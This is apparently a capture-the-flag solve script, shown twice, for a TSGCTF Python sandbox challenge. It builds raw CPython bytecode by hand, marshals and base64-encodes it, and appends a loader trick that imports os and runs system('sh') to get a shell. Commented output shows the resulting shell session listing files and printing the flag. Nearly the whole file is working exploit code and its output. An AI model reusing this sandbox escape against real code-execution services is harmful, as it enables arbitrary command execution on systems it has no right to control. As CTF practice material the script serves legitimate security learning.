lebr0nli/solve.py

## solve.py
import base64
import dis
import marshal
import subprocess

from opcode import opmap


def f(): pass

code = bytes(
        [
            opmap['RESUME'], 0,
            opmap['LOAD_CONST'], 227,
            opmap['UNPACK_EX'], 29,
            opmap['BUILD_TUPLE'], 28,
            opmap['POP_TOP'], 0,
            opmap['SWAP'], 2,
            opmap['POP_TOP'], 0,
            opmap['LOAD_CONST'], 227,
            opmap['SWAP'], 2,
            opmap['BINARY_SUBSCR'], 0, 0, 0,
            opmap['COPY'], 1,
            opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
            opmap['LOAD_CONST'], 227,
            opmap['UNPACK_EX'], 21,
            opmap['BUILD_TUPLE'], 20,
            opmap['POP_TOP'], 0,
            opmap['SWAP'], 2,
            opmap['POP_TOP'], 0,
            opmap['LOAD_CONST'], 227,
            opmap['SWAP'], 2,
            opmap['BINARY_SUBSCR'], 0, 0, 0,
            opmap['SWAP'], 2,
            opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
            opmap['RETURN_VALUE'], 0,
        ]
)
# dis.dis(code)
f.__code__ = f.__code__.replace(co_code=code, co_names=(), co_consts=(), co_cellvars=(), co_freevars=(), co_varnames=())
payload = base64.b64encode(marshal.dumps(f.__code__))
payload += b"\nloads.__self__.__loader__.load_module('os').system('sh')\n"
print(payload.decode())
# subprocess.run(["python3", "./executor.py"], input=payload)

# Give me your source:
# 4wAAAAAAAAAAAAAAAAAAAAADAAAA80AAAACXAGTjXh1mHAEAYwIBAGTjYwIZAAAAeAGrAAAAAAAAAGTjXhVmFAEAYwIBAGTjYwIZAAAAYwKrAAAAAAAAAFMAqQByAgAAAHICAAAA8wAAAAD6FS9ob21lL3VidW50dS9zb2x2ZS5wedoBZnIFAAAABwAAAPMCAAAAgQByAwAAAA==
# loads.__self__.__loader__.load_module('os').system('sh')<built-in function input>
# ls
# executor.py
# flag-9b949bf8bdf1beef0f7a9f4a7ef46c12
# start.sh
# cat flag*
# TSGCTF{our_caffeine_knight_slays_python_bytes}
	import base64
	import dis
	import marshal
	import subprocess

	from opcode import opmap


	def f(): pass

	code = bytes(
	[
	opmap['RESUME'], 0,
	opmap['LOAD_CONST'], 227,
	opmap['UNPACK_EX'], 29,
	opmap['BUILD_TUPLE'], 28,
	opmap['POP_TOP'], 0,
	opmap['SWAP'], 2,
	opmap['POP_TOP'], 0,
	opmap['LOAD_CONST'], 227,
	opmap['SWAP'], 2,
	opmap['BINARY_SUBSCR'], 0, 0, 0,
	opmap['COPY'], 1,
	opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
	opmap['LOAD_CONST'], 227,
	opmap['UNPACK_EX'], 21,
	opmap['BUILD_TUPLE'], 20,
	opmap['POP_TOP'], 0,
	opmap['SWAP'], 2,
	opmap['POP_TOP'], 0,
	opmap['LOAD_CONST'], 227,
	opmap['SWAP'], 2,
	opmap['BINARY_SUBSCR'], 0, 0, 0,
	opmap['SWAP'], 2,
	opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
	opmap['RETURN_VALUE'], 0,
	]
	)
	# dis.dis(code)
	f.__code__ = f.__code__.replace(co_code=code, co_names=(), co_consts=(), co_cellvars=(), co_freevars=(), co_varnames=())
	payload = base64.b64encode(marshal.dumps(f.__code__))
	payload += b"\nloads.__self__.__loader__.load_module('os').system('sh')\n"
	print(payload.decode())
	# subprocess.run(["python3", "./executor.py"], input=payload)

	# Give me your source:
	# 4wAAAAAAAAAAAAAAAAAAAAADAAAA80AAAACXAGTjXh1mHAEAYwIBAGTjYwIZAAAAeAGrAAAAAAAAAGTjXhVmFAEAYwIBAGTjYwIZAAAAYwKrAAAAAAAAAFMAqQByAgAAAHICAAAA8wAAAAD6FS9ob21lL3VidW50dS9zb2x2ZS5wedoBZnIFAAAABwAAAPMCAAAAgQByAwAAAA==
	# loads.__self__.__loader__.load_module('os').system('sh')<built-in function input>
	# ls
	# executor.py
	# flag-9b949bf8bdf1beef0f7a9f4a7ef46c12
	# start.sh
	# cat flag*
	# TSGCTF{our_caffeine_knight_slays_python_bytes}